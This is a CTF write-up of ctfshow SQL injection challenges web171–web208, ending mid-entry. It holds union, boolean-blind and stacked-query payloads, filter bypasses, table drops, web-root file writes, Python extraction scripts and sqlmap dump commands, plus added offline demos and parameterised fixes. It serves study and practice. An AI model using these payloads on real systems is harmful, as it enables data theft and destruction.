ctfshow web: SQL Injection

Finally starting the legendary SQL injection section; a whole new world opens up. The road is long, keep going o.0

SQL injection is colloquially known as the hacker's fill-in-the-blanks game.

web171

Challenge

```php
// Concatenate the SQL statement to look up the user with the given id
$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";
```

Solution

The id value is spliced straight into the WHERE clause, so an `or` can be appended to it: if no row has id 999, the `or` branch selects id 26 instead. Because `and` binds tighter than `or`, the `username !='flag'` condition only applies to the first branch, so the flag row itself comes back. The resulting statement is `select username,password from user where username !='flag' and id = '999' or id = '26' limit 1;`.

The page only lists rows up to id 25; the flag row sits past that, at id 26.

payload:

```
999' or id = '26
```
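To make the mechanics concrete, here is an added example that is not part of the original writeup: the web171 query rebuilt against an in-memory SQLite table with constructed rows. It runs the payload through the vulnerable concatenation and through a parameterised version of the same statement, showing why the first leaks the flag row and the second does not. The table contents and the flag value are made up for the demo.

```python
import sqlite3

# Added example (not from the writeup): the web171 query rebuilt against an
# in-memory SQLite table so the effect of the payload can be seen offline.
# Rows, passwords and the flag value are constructed for the demo; the
# vulnerable statement is the challenge's, the parameterised one is the fix.

ROWS = [
    (1, "userAUTO", "pass1"),
    (25, "alice", "pass25"),
    (26, "flag", "ctfshow{constructed-sample-flag}"),
]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("create table user(id integer, username text, password text)")
    db.executemany("insert into user values(?,?,?)", ROWS)
    return db


def vulnerable_lookup(db, user_id):
    """Mirrors the challenge: $_GET['id'] is concatenated straight into the
    statement, so the quote in the payload terminates the id literal and the
    rest of the input becomes SQL."""
    sql = ("select username,password from user where username !='flag' "
           "and id = '" + user_id + "' limit 1;")
    return db.execute(sql).fetchone()


def safe_lookup(db, user_id):
    """Parameterised version: the whole input is bound as one value, so the
    quote and the `or` are data, not syntax, and nothing matches."""
    sql = ("select username,password from user where username !='flag' "
           "and id = ? limit 1")
    return db.execute(sql, (user_id,)).fetchone()


if __name__ == "__main__":
    db = make_db()
    payload = "999' or id = '26"
    # and binds tighter than or, so the WHERE reads
    #   (username != 'flag' and id = '999') or id = '26'
    print(vulnerable_lookup(db, payload))   # ('flag', 'ctfshow{...}')
    print(safe_lookup(db, payload))         # None
```

The same swap, a quote-terminated literal replaced by a bound parameter, is the fix for every challenge in this series where the injection point is a value. Where the injection point is an identifier (the table name from web183 onward) a parameter cannot be used and the input has to be checked against an allow-list of known names instead.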

web172

Challenge

The source shown has two relevant pieces: the query itself and a check on the rows it returns.

The check requires that the returned username is not flag.

Solution

```
9999' union select id,password from ctfshow_user2 where username = 'flag
```

Union query; the select list returns id in place of username, so the string flag never appears in the column the check inspects while the password column still carries the flag.

web173

Challenge

The returned values are checked for the string flag.

Solution

payload:

```
9999' union select id,hex(b.username),b.password from ctfshow_user3 as b where b.username = 'flag
```

The username is returned hex-encoded (hex(), not a binary string), so the literal flag never appears in the response and the check passes; decode the hex to read it.

web174

Challenge

Solution

Digits in the output are filtered, so each digit of the base64-encoded result is replaced with a symbol marker (@A..@J for 1..9,0) and restored on the client side.

payload:

```
?id=0' union select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(to_base64(username),"1","@A"),"2","@B"),"3","@C"),"4","@D"),"5","@E"),"6","@F"),"7","@G"),"8","@H"),"9","@I"),"0","@J"),replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(to_base64(password),"1","@A"),"2","@B"),"3","@C"),"4","@D"),"5","@E"),"6","@F"),"7","@G"),"8","@H"),"9","@I"),"0","@J") from ctfshow_user4 where username="flag" --+
```

--+ : comment syntax. It comments out the remainder of the original SQL statement so the trailing `' limit 1` cannot interfere with the query (the + turns into a space after URL decoding, which the `-- ` comment requires).

Decoding script

```python
import base64

# paste the @-masked base64 string from the response here
flag64 = "xxx"

flag = flag64.replace("@A", "1").replace("@B", "2").replace("@C", "3").replace("@D", "4").replace("@E", "5").replace("@F", "6").replace("@G", "7").replace("@H", "8").replace("@I", "9").replace("@J", "0")

print(base64.b64decode(flag))
```
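As an added example, not code from the original writeup, here is the payload generalised: a function that builds the nested replace() wrapper for any column expression, a local imitation of what MySQL would return for a known value, and the inverse decoder. The @A..@J marker alphabet is the page's own; the sample flag value is constructed for the demo.

```python
import base64

# Added example (not from the writeup): generates the nested replace() wrapper
# used in the web174 payload for any column expression, and the matching
# decoder. The @A..@J marker alphabet is the page's own; the sample flag value
# is constructed for the demo, and mask_digits_local() imitates what MySQL
# would return so the decoder can be checked without a database.

DIGIT_MARKERS = {"1": "@A", "2": "@B", "3": "@C", "4": "@D", "5": "@E",
                 "6": "@F", "7": "@G", "8": "@H", "9": "@I", "0": "@J"}


def mask_digits_sql(expr):
    """Wrap to_base64(expr) in one replace() per digit. '@' is not a base64
    character, so each marker is unambiguous on the way back."""
    sql = f"to_base64({expr})"
    for digit, marker in DIGIT_MARKERS.items():
        sql = f'replace({sql},"{digit}","{marker}")'
    return sql


def mask_digits_local(value):
    """Local imitation of mask_digits_sql() for a known value (bytes)."""
    s = base64.b64encode(value).decode()
    for digit, marker in DIGIT_MARKERS.items():
        s = s.replace(digit, marker)
    return s


def unmask_digits(masked):
    """Undo the markers and base64-decode. MySQL's to_base64() wraps lines
    every 76 characters; b64decode() drops those newlines by default."""
    s = masked
    for digit, marker in DIGIT_MARKERS.items():
        s = s.replace(marker, digit)
    return base64.b64decode(s)


if __name__ == "__main__":
    print(mask_digits_sql("username"))
    masked = mask_digits_local(b"ctfshow{1234-5678-90}")
    print(masked, unmask_digits(masked))
```

Because the markers contain no digits, the order of the ten replace() calls does not matter, and because `@` never occurs in base64 output the decoding is unambiguous even though the markers are two characters long.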

web175

Challenge

This is the last challenge in the series with no filtering.

Solution

When the output is restricted, try another channel to carry the data out: a file write with into outfile.

Method 1: time-based blind injection

My script didn't produce a result..

Method 2: file write

Writing a file requires knowing the web root, usually /var/www/html/. On the database side it also requires the FILE privilege and a secure_file_priv setting that allows writing to that directory; if either is missing, the query fails.

Construct the payload:

```
0' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'--+
```

Then read the result back from /1.txt on the site.

web176

Challenge

select is filtered.

Solution

Approach 1

```
999' or username = 'flag
```

Query the flag row directly, without a select of our own.

Approach 2

```
0' union Select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database() --+
```

Union query to list the table names.

Case-variation bypass: the filter matches lowercase select only, so Select gets through.

```
0' union Select 1,2,group_concat(password) from ctfshow_user where username = 'flag' --+
```

web177

Challenge

Solution

Spaces are filtered; /**/ or %0a (newline) can stand in for them, and %23 (#) replaces the filtered comment sequence. That is enough to take the flag directly:

```
'/**/Union/**/Select/**/1,2,group_concat(password)/**/from/**/ctfshow_user/**/where/**/username='flag'%23
```

web178

Challenge

Solution

Compared with the previous challenge the /**/ comment is filtered too, but a newline (%0a), parentheses, %09, %0b, %0c or %0d work as separators just the same:

```
'%0aUnion%0aSelect%0a1,2,group_concat(password)%0afrom%0actfshow_user%0awhere%0ausername='flag'%23
```

web179

Challenge

Solution

```
'%0cUnion%0cSelect%0c1,2,group_concat(password)%0cfrom%0cctfshow_user%0cwhere%0cusername='flag'%23
```

%0c (form feed) still works as a separator.

web180

Solution

```
-1'%0cor%0cusername%0clike%0c'flag
```

Fuzzy match with like.

web181

```
-1'%0cor%0cusername%0clike%0c'flag
```

web182

The WHERE clause joins two conditions with and, so operator precedence can be used.

MySQL operator precedence (higher number = binds tighter):

Precedence  Operator
1   :=
2   ||, OR, XOR
3   &&, AND
4   NOT
5   BETWEEN, CASE, WHEN, THEN, ELSE
6   =, <=>, >=, >, <=, <, <>, !=, IS, LIKE, REGEXP, IN
7   |
8   &
9   <<, >>
10  -, +
11  *, /, DIV, %, MOD
12  ^
13  - (unary minus), ~ (unary bit inversion)
14  !
15  BINARY, COLLATE

AND binds tighter than OR, so `a and b or c` parses as `(a and b) or c`. Appending an or clause therefore makes the whole WHERE true whenever that clause is true, regardless of the and-ed conditions before it: `1 and 0 or 1` evaluates to 1.

web183

Challenge

Blind injection: the response only reveals whether the filtered count is 1 (the script below is boolean-based, not time-based), so the flag is recovered one character at a time.

Solution

```python
import requests
import time

url = "http://643bcc02-350c-4881-95fb-06a1deda60af.challenge.ctf.show/select-waf.php"

# candidate alphabet; '}' first so the closing brace is found quickly
flagstr = "}abcdefghijklmnopqrstuvwxyz-0123456789{"
#flagstr = "ctfshow{0123456789-}"
flag = ""
for i in range(0, 40):
    for x in flagstr:
        # spaces are filtered, so backticks delimit the identifiers instead
        data = {
            "tableName": "`ctfshow_user`where`pass`regexp(\"ctfshow{}\")".format(flag + x)
        }
        response = requests.post(url, data=data)
        time.sleep(0.3)
        # user_count = 1 means exactly one row matched the prefix guessed so far
        if response.text.find("user_count = 1;") > 0:
            flag += x
            break
        else:
            print("{} is wrong".format(x))
    print(flag)
```

web184

Challenge

where is filtered.

Solution

having can replace where, with a constraint: a HAVING clause must come after GROUP BY (and before ORDER BY).

Hexadecimal literals: either X'...' (x followed by a quoted string) or 0x...; they can also be combined with arithmetic to express numbers.

Test (0x63746673686f777b25 is the hex of ctfshow{%):

```
tableName=ctfshow_user group by pass having pass like 0x63746673686f777b25
```

Script

```python
import requests
import time

url = "http://d4466757-0b75-4a39-97c5-0b1a853512c2.challenge.ctf.show/select-waf.php"

# candidate alphabet; '_' is a LIKE single-character wildcard, so it is tried last
flagstr = "ctfshow{qeryuipadgjklzxvbnm0123456789-}_"  # 40
flag = ""
for i in range(0, 40):
    for x in flagstr:
        # 0x63746673686f777b = 'ctfshow{', trailing 25 = '%': the known prefix,
        # the characters guessed so far, then a wildcard for the rest
        data = {
            "tableName": "ctfshow_user group by pass having pass like 0x63746673686f777b{}25".format(
                "".join(hex(ord(c))[2:] for c in flag + x))
        }
        #print(data)
        response = requests.post(url, data=data)
        # the target limits concurrent requests, so pause between probes
        time.sleep(0.3)
        if response.text.find("$user_count = 1;") > 0:
            print("++++++++++++++++ {} is right".format(x))
            flag += x
            break
        else:
            continue
print("ctfshow{" + flag)
```

On the script: `[2:]` slices off the 0x prefix that Python's hex() adds, since the literal already starts with 0x.

web185

Challenge

Digits are filtered, so the strings have to be built without them.

Solution

```sql
select concat(true+true,true+true);
```

true evaluates to 1 and false to 0, so a sum of true terms produces any integer, char() turns an integer into a character, and concat() assembles the string. That is enough to build the comparison value without writing a single digit.

Script:

```python
import requests
import time
import string

def formatString(s):
    """Render s as a digit-free MySQL expression: each character becomes
    char((true+true+...)) and each digit becomes a bare (true+...) sum,
    all wrapped in a single concat()."""
    temp = "concat("
    for x in s:
        tip = 0
        if x in string.digits:
            tmp = int(x)
        else:
            tip = 1
            temp += "char("
            tmp = ord(x)
        if tmp == 0:
            temp += "false"
        else:
            temp_d = "("
            for i in range(0, tmp):
                temp_d += "true+"
            temp_d = temp_d[:-1] + ")"
            if tip == 1:
                temp_d += ")"
            temp += temp_d
        temp += ","
    temp = temp[:-1] + ")"
    return temp

#print(formatString("0x63746673686f777b"))

url = "http://1cde41e5-17c7-4db1-bd41-cc77ebaa7e85.challenge.ctf.show/select-waf.php"
# reordering dic by expected character frequency would make this faster
dic = "ctfshow{qeryuipadgjklzxvbnm0123456789-}_"
flag = "ctfshow{"
for i in range(0, 40):
    for x in dic:
        data = {
            "tableName": "ctfshow_user group by pass having pass regexp({})".format(formatString(flag + x))
        }
        #print(data)
        response = requests.post(url, data=data)
        time.sleep(0.3)
        if response.text.find("$user_count = 1;") > 0:
            print("[**] {} is right".format(x))
            flag += x
            break
        else:
            #print("[--] {} is wrong".format(x))
            continue
print("[flag]:" + flag)
```

web186

The previous challenge's script still works here.

web187

Challenge

```
string md5( string $str[, bool $raw_output = false] )
```
  • raw_output: when set to TRUE the MD5 digest is returned as raw binary, 16 bytes long.

The "universal password" comes into play:

ffifdyop

Solution

```sql
select '1' or 'string'
```

As long as the string begins with a non-zero digit it is coerced to a non-zero number, so the or is always true.

payload:

```sql
select count(*) from user where username ='' or '6nb'
```

The raw md5 of ffifdyop begins with the bytes 'or'6, so once the digest is spliced into the quoted comparison the condition becomes exactly this clause. "Binary format" here does not mean a string of 0s and 1s; it is the raw 16-byte digest (binary mode).

web188

Challenge

If username is not wrapped in quotes, the comparison is numeric and every row comes back.

Solution

username: 0

password: 0

Intercept the request and set both fields to 0.
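Both web187 and web188 rest on the same MySQL behaviour: a string placed in a numeric context is converted to the number its leading characters spell, or 0 if there are none. The following added example, not code from the writeup, models that conversion in Python and uses it to verify why the raw md5 of ffifdyop yields an always-true `or` and why `username = 0` matches every non-numeric username. The regular expression is my approximation of MySQL's rule, not MySQL's own implementation.

```python
import hashlib
import re

# Added example (not from the writeup): a Python model of the implicit
# string-to-number conversion MySQL performs when a string lands in a numeric
# or boolean context. It explains both web187 (`or '6nb'` from the raw md5 of
# ffifdyop) and web188 (`username = 0` matching every non-numeric username).
# The regex is an approximation of MySQL's "longest leading numeric prefix,
# else 0" rule, not MySQL's own code.

_NUM_PREFIX = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?")


def mysql_str_to_num(s):
    """Number MySQL derives from s in a numeric context: the leading numeric
    prefix, or 0 when there is none (MySQL also logs a 'Truncated incorrect
    DOUBLE value' warning, which does not stop the query)."""
    m = _NUM_PREFIX.match(s)
    return float(m.group(0)) if m else 0.0


def raw_md5_prefix(password, n=5):
    """First n bytes of md5($password, true), the raw digest PHP splices in."""
    return hashlib.md5(password.encode()).digest()[:n]


def raw_md5_bypasses(password):
    """True when the raw md5 of password, concatenated into a quoted
    comparison such as the page's `where username =''or'6nb'`, closes the open
    quote with 'or' and leaves text that coerces to a non-zero number, i.e.
    an always-true OR."""
    raw = hashlib.md5(password.encode()).digest().decode("latin-1")
    if not raw.startswith("'or'"):
        return False
    return mysql_str_to_num(raw[4:]) != 0


def numeric_username_matches(stored_username, supplied):
    """web188: with `username = $u` unquoted, MySQL compares numerically, so a
    supplied 0 equals every stored username that has no leading digits."""
    return mysql_str_to_num(stored_username) == float(supplied)


if __name__ == "__main__":
    print(raw_md5_prefix("ffifdyop"))               # b"'or'6"
    print(raw_md5_bypasses("ffifdyop"))             # True
    print(numeric_username_matches("userAUTO", 0))  # True
```

The defensive reading is the same for both challenges: compare strings with a bound parameter of the right type (or hash the password and compare hashes with a constant-time function in application code), never by splicing raw bytes into SQL text.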

web189

Challenge

Hint

```
The flag is in the file api/index.php
```

Solution

```python
import requests
import time

url = "http://6ac41a56-faf0-4d7f-a34b-783b37a00d1b.challenge.ctf.show/api/"
flagstr = "}{<>$=,;_ 'abcdefghijklmnopqr-stuvwxyz0123456789"

flag = ""
# starting offset: the position of the flag inside index.php, found by trial
for i in range(257, 257 + 60):
    for x in flagstr:
        # load_file() reads the PHP source; compare one byte at offset i.
        # A quote in the candidate has to be escaped or it breaks the literal.
        data = {
            "username": "if(substr(load_file('/var/www/html/api/index.php'),{},1)=('{}'),1,0)".format(i, x.replace("'", "\\'")),
            "password": "0"
        }
        #print(data)
        response = requests.post(url, data=data)
        time.sleep(0.3)
        # 8d25 appears in the response when username evaluates to 1 (see the screenshot)
        if response.text.find("8d25") > 0:
            print("++++++++++++++++++ {} is right".format(x))
            flag += x
            break
        else:
            continue
print(flag)
```

load_file() makes the database read the file for us; since username is compared without quotes (as in web188), the if() result of 1 or 0 decides which page variant comes back.

web190

Challenge

Boolean-based blind injection.

Solution script

```python
import requests
import time

url = "http://de81ce39-b97b-47be-84e6-1daf7cc186af.challenge.ctf.show/api/"
flag = ""
for i in range(1, 60):
    hi = 127
    lo = 32
    while 1:
        # invariant: lo <= ord(char) < hi; stop when the interval has one value
        mid = (hi + lo) >> 1
        if lo == mid:
            flag += chr(mid)
            print(flag)
            break
        #payload = "admin'and (ascii(substr((select database()),{},1))<{})#".format(i,mid)
        #ctfshow_web
        #payload = "admin'and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<{})#".format(i,mid)
        #ctfshow_fl0g
        #payload = "admin'and (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{},1))<{})#".format(i,mid)
        #id,f1ag
        payload = "admin'and (ascii(substr((select f1ag from ctfshow_fl0g),{},1))<{})#".format(i, mid)

        data = {
            "username": payload,
            "password": 0,
        }
        res = requests.post(url=url, data=data)
        time.sleep(0.3)
        # 8bef appears in the response when the condition holds (the row was found)
        if res.text.find("8bef") > 0:
            hi = mid
        else:
            lo = mid
```
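The scripts on this page (web183 through web194, and the time-based ones from web214 on) are all instances of one algorithm: a predicate the server answers with yes/no, driven by a per-character search. The following added example, not code from the writeup or the challenge, factors that algorithm out into a reusable extractor and exercises it against a constructed in-memory SQLite database, so it runs offline. Table, column and flag contents are made up; SQLite's unicode() stands in for MySQL's ascii().

```python
import sqlite3

# Added example (not from the writeup or the challenge): the binary-search
# extraction the web190 script performs, factored into a reusable routine and
# exercised against a constructed in-memory SQLite database. Table, column and
# flag contents are made up; SQLite's unicode() stands in for MySQL's ascii().

SECRET = "ctfshow{constructed-example-flag}"   # constructed sample value


def make_db(secret=SECRET):
    db = sqlite3.connect(":memory:")
    db.executescript("""
        create table ctfshow_user(id integer, username text, pass text);
        insert into ctfshow_user values(1, 'admin', 'constructed-pass');
        create table ctfshow_fl0g(id integer, f1ag text);
    """)
    db.execute("insert into ctfshow_fl0g values(1, ?)", (secret,))
    return db


def row_exists(db, username):
    """Stand-in for the vulnerable login: username is concatenated unescaped
    and the only thing the caller learns is whether a row came back."""
    sql = "select id from ctfshow_user where username='" + username + "'"
    return db.execute(sql).fetchone() is not None


def make_oracle(db):
    """Turn row_exists() into the predicate the extractor needs:
    oracle(pos, n) is True iff ord(secret[pos-1]) < n (pos is 1-based)."""
    def oracle(pos, n):
        payload = ("admin' and (unicode(substr((select f1ag from ctfshow_fl0g),"
                   f"{pos},1))<{n})--")
        return row_exists(db, payload)
    return oracle


def blind_extract(oracle, max_len=64, lo=32, hi=127):
    """Recover a printable string from a boolean oracle one character at a
    time, about 7 queries per character. Positions past the end of the
    string must make the oracle return False; that ends the extraction.
    For a time-based variant, pass an oracle that returns True when the
    request timed out instead of when a row was found."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(pos, hi):          # nothing (or NULL) at this position
            break
        a, b = lo, hi                    # invariant: a <= ord(char) < b
        while b - a > 1:
            mid = (a + b) // 2
            if oracle(pos, mid):
                b = mid
            else:
                a = mid
        out += chr(a)
    return out


if __name__ == "__main__":
    db = make_db()
    print(blind_extract(make_oracle(db)))
```

Past the end of the string substr() returns an empty string, unicode() of that is NULL, and `NULL < n` is NULL, so the WHERE fails and the oracle reports False; that is what terminates the loop without a separate length query. The same termination trick (ascii('') being 0) is what the web214 script relies on.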

web191

Challenge

Compared with the previous challenge, ascii is filtered as well.

Solution

Replace ascii with ord in the previous script.

web192

Challenge

Filtered:

```php
// password check
if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';   // "password must be numeric"
    die(json_encode($ret));
}

// password comparison
if($row['pass']==$password){
    $ret['msg']='登陆成功';         // "login successful"
}

// TODO: feels like something is missing here, odd
if(preg_match('/file|into|ascii|ord|hex/i', $username)){
    $ret['msg']='用户名非法';       // "illegal username"
    die(json_encode($ret));
}
```

Solution

```python
# @Author:feng
import requests

url = 'http://b5aa8d9c-b59e-442b-b6fd-e94840cb9c80.challenge.ctf.show/api/index.php'

flag = ''
for i in range(1, 100):
    lo = 32
    hi = 128
    while 1:
        j = lo + (hi - lo) // 2
        if lo == j:
            flag += chr(j)
            print(flag.lower())
            # substr() past the end returns '', which sorts below every
            # candidate, so the search bottoms out at chr(32): end of the flag
            if chr(j) == " ":
                exit()
            break

        # ascii/ord/hex are filtered: compare the character directly as a string
        # (case-insensitive under the default collation, hence .lower() above)
        payload = "' or if(substr((select group_concat(f1ag) from ctfshow_fl0g),{},1)<'{}',1,0)-- -".format(i, chr(j))

        data = {
            'username': payload,
            'password': 1
        }
        r = requests.post(url=url, data=data).text
        #print(r)
        # "\u5bc6\u7801\u9519\u8bef" is JSON for 密码错误 (wrong password): a row matched
        if r"\u5bc6\u7801\u9519\u8bef" in r:
            hi = j
        else:
            lo = j
```

web193

Challenge

```php
// password check
if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';   // "password must be numeric"
    die(json_encode($ret));
}

// password comparison
if($row['pass']==$password){
    $ret['msg']='登陆成功';         // "login successful"
}

// TODO: feels like something is missing here, odd
if(preg_match('/file|into|ascii|ord|hex|substr/i', $username)){
    $ret['msg']='用户名非法';       // "illegal username"
    die(json_encode($ret));
}
```

substr is filtered.

Solution

With substr gone, use like or regexp pattern matching instead. Note that the table name changed, so it has to be enumerated again:

```python
# @Author:feng
import requests

url = 'http://8ccd1084-322d-4fd7-86e9-81f5c50679c2.challenge.ctf.show/api/index.php'
flag = ""
for i in range(0, 100):
    # '_' is a LIKE wildcard, so it is tried last
    for j in "0123456789abcdefghijklmnopqrstuvwxyz-,{}_":
        #payload = "' or if((select group_concat(table_name) from information_schema.tables where table_schema=database()) like '{}',1,0)-- -".format(flag+j+"%")
        #payload = "' or if((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg') like '{}',1,0)-- -".format(flag+j+"%")
        payload = "' or if((select group_concat(f1ag) from ctfshow_flxg) like '{}',1,0)-- -".format(flag + j + "%")

        data = {
            'username': payload,
            'password': 1
        }
        #print(payload)
        r = requests.post(url=url, data=data)
        # 密码错误 (wrong password) in the response means the prefix matched
        if r"\u5bc6\u7801\u9519\u8bef" in r.text:
            flag += j
            print(flag)
            if j == '}':
                exit()
            break
```

web194

Challenge

Boolean-based blind injection.

Filter

```php
// password check
if(!is_numeric($password)){
    $ret['msg']='密码只能为数字';   // "password must be numeric"
    die(json_encode($ret));
}

// password comparison
if($row['pass']==$password){
    $ret['msg']='登陆成功';         // "login successful"
}

// TODO: feels like something is missing here, odd
if(preg_match('/file|into|ascii|ord|hex|substr|char|left|right|substring/i', $username)){
    $ret['msg']='用户名非法';       // "illegal username"
    die(json_encode($ret));
}
```

Solution

```python
# @Author:Y4tacker
import requests
# instr() and friends would work too: LOCATE, POSITION, INSTR, FIND_IN_SET, IN, LIKE
url = "http://711d56c7-9652-4fc0-b8e6-20beafccb0bb.challenge.ctf.show/api/"
final = ""
stttr = "flag{}-_1234567890qwertyuiopsdhjkzxcvbnm"
for i in range(1, 45):
    for j in stttr:
        final += j
        # table name: ctfshow_flxg
        payload = f"admin' and if(locate('{final}',(select table_name from information_schema.tables where table_schema=database() limit 0,1))=1,1,2)='1"
        # column name: f1ag
        # payload = f"admin' and if(locate('{final}',(select column_name from information_schema.columns where table_name='ctfshow_flxg' limit 1,1))=1,1,2)='1"
        #payload = f"admin' and if(locate('{final}',(select f1ag from ctfshow_flxg limit 0,1))=1,1,2)='1"
        data = {
            'username': payload,
            'password': '1'
        }
        r = requests.post(url, data=data)
        # 密码错误 (wrong password): the admin row matched, so the prefix is right
        if "密码错误" == r.json()['msg']:
            print(final)
        else:
            # wrong guess: drop the character again
            final = final[:-1]
```

The core of the payload: `locate(prefix, value) = 1` holds only when the guessed prefix sits at the very start of the value, and `limit 0,1` picks the first row. The trailing `='1` closes the opened quote so the statement stays valid: if() returns 1 on a hit and `1='1'` is true, while on a miss it returns 2 and the condition is false.

web195

Challenge

Stacked injection begins.

Solution

The table name is given, so update the password directly:

```
1;update`ctfshow_user`set`pass`=1
```

A hex literal works for the username as well, because ${username} is not quoted (0x61646d696e is 'admin'):

```
0x61646d696e;update`ctfshow_user`set`pass`=1
```

Then log in using loose-typed matching: username 0 compares equal to any non-numeric username.

username: 0

pass: 1

web196

Challenge

Solution

ASEdase

web197

Challenge

Solution

Approach 1

```
0;drop table ctfshow_user; create table ctfshow_user(`username` varchar(100), `pass` varchar(100)); insert ctfshow_user(`username`,`pass`) value(1,2)
```

Approach 2

alter table: rename the columns so that id and pass swap places; the small numeric id then serves as the password.

```
username:   0;alter table ctfshow_user change column `pass` `a` varchar(255);alter table ctfshow_user change column `id` `pass` varchar(255);alter table ctfshow_user change column `a` `id` varchar(255)
pass: increment the number until login succeeds
# submit the payload as the username once; afterwards just send 0
```

The password has to be guessed by hand here; the script below automates the attempts.

Another script:

```python
# @Author:Y4tacker
import requests

url = "http://01e38040-0e5a-4109-9fa4-6e2c11b0517d.challenge.ctf.show/api/"
for i in range(100):
    if i == 0:
        # first request: swap the pass and id columns via three renames
        data = {
            'username': '0;alter table ctfshow_user change column `pass` `ppp` varchar(255);alter table ctfshow_user '
                        'change column `id` `pass` varchar(255);alter table ctfshow_user change column `ppp` `id` '
                        'varchar(255);',
            'password': f'{i}'
        }
        r = requests.post(url, data=data)
    # then try each small integer as the password (the former id value)
    data = {
        'username': '0x61646d696e',
        'password': f'{i}'
    }
    r = requests.post(url, data=data)
    if "登陆成功" in r.json()['msg']:
        print(r.json()['msg'])
        break
```

web198

Challenge

drop is filtered as well:

```php
//TODO: feels like something is missing here, odd; surely not first-blooded again
if('/\*|\#|\-|\x23|\'|\"|union|or|and|\x26|\x7c|file|into|select|update|set|create|drop/i', $username)){
    $ret['msg']='用户名非法';       // "illegal username"
    die(json_encode($ret));
}

if($row[0]==$password){
    $ret['msg']="登陆成功 flag is $flag";
}
```

Solution

Only alter is left, so reuse the previous challenge's script.

web199

Challenge

Parentheses are filtered.

Solution

Use show. From the query the challenge gives, the table is ctfshow_user, so `show tables` returns a result set that necessarily contains one row equal to ctfshow_user.

Alternatively, swap the columns without any parentheses by using the text type:

```
0;alter table ctfshow_user change `username` `passw` text;alter table ctfshow_user change `pass` `username` text;alter table ctfshow_user change `passw` `pass` text;
```

Then log in with userAUTO (the original default username, which now sits in the pass column) as the password.

web200

Solution

Same as above.

web201

Challenge

Systematic sqlmap practice begins.

Use --user-agent to set the User-Agent header

Use --referer to pass the Referer check

Solution

Enumerate databases

```
sqlmap -u "http://10f59b15-eadb-4add-ae79-ae2d4b9eeb01.challenge.ctf.show/api/?id=1" --referer="ctf.show" --dbs
```

Enumerate tables

```
sqlmap -u "http://10f59b15-eadb-4add-ae79-ae2d4b9eeb01.challenge.ctf.show/api/?id=1" --referer="ctf.show" -D ctfshow_web --tables
```

Enumerate columns

```
sqlmap -u "http://10f59b15-eadb-4add-ae79-ae2d4b9eeb01.challenge.ctf.show/api/?id=1" --referer="ctf.show" -D ctfshow_web -T ctfshow_user --columns
```

Dump the flag

```
sqlmap -u "http://10f59b15-eadb-4add-ae79-ae2d4b9eeb01.challenge.ctf.show/api/?id=1" --referer="ctf.show" -D ctfshow_web -T ctfshow_user -C pass --dump --where "pass like '%ctfshow%'"
```

web202

Challenge

Use --data to make sqlmap send the parameter in a POST body.

Solution

```
sqlmap -u "http://6497680f-199a-4a51-89c8-c4c06cae7530.challenge.ctf.show/api/" --data "id=1" --referer="ctf.show" -D ctfshow_web -T ctfshow_user -C pass --dump --where "pass like '%ctfshow%'"
```

web203

Challenge

Use --method to change the HTTP method sqlmap uses.

Solution

```
sqlmap -u "http://cc5164e8-3f5e-40e3-a153-d8da2eb9878a.challenge.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --dbms=mysql -D ctfshow_web -T ctfshow_user --dump --batch
```

web204

Challenge

Use --cookie to send cookie data.

Solution

```
sqlmap -u "http://82903868-ed06-4658-8c0c-09b5d12b63ca.challenge.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --cookie="PHPSESSID=vdl2nbcir7clj1j46c806ct956;ctfshow=25a1553f2eebe9af47e00bdc9126795b" --headers="Content-Type: text/plain" --dbms=mysql -D ctfshow_web -T ctfshow_user --dump --batch
```

web205

Challenge

The API call requires authentication.

Solution

--safe-url with --safe-freq=1 makes sqlmap visit the token endpoint before every injected request, so the session stays authorised throughout the run.

```
sqlmap -u "http://5a11ef81-3935-4d1a-aeaa-f47bb64873e3.challenge.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql -D ctfshow_web -T ctfshow_flax -C flagx --dump --headers="Content-Type: text/plain" --safe-url="http://5a11ef81-3935-4d1a-aeaa-f47bb64873e3.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch
```

web206

Challenge

The SQL needs the quote closed (the parameter is quoted).

Solution

```
sqlmap -u http://a3c7ed79-34db-44db-a600-af9a0d55eb0e.challenge.ctf.show/api/index.php --safe-url=http://a3c7ed79-34db-44db-a600-af9a0d55eb0e.challenge.ctf.show/api/getToken.php --safe-freq=1 --method=PUT --headers="Content-Type: text/plain" --data="id=1" --dbms=mysql --current-db --tables -T ctfshow_flaxc --columns -C flagv --dump --level=3
```

Or let sqlmap work out the closing itself and dump everything:

```
sqlmap -u "http://a3c7ed79-34db-44db-a600-af9a0d55eb0e.challenge.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql --dump --headers="Content-Type: text/plain" --safe-url="http://a3c7ed79-34db-44db-a600-af9a0d55eb0e.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch
```

web207

Challenge

First taste of --tamper.

Solution

```
sqlmap -u "http://795656d9-3dec-4e59-95a8-8ce69ee92dfa.challenge.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql --dump --headers="Content-Type: text/plain" --safe-url="http://795656d9-3dec-4e59-95a8-8ce69ee92dfa.challenge.ctf.show/api/getToken.php" --tamper=space2comment --safe-freq=1 --batch
```

The only addition is:

```
--tamper=space2comment
```

web208

Challenge

Second taste of --tamper.

Solution

```
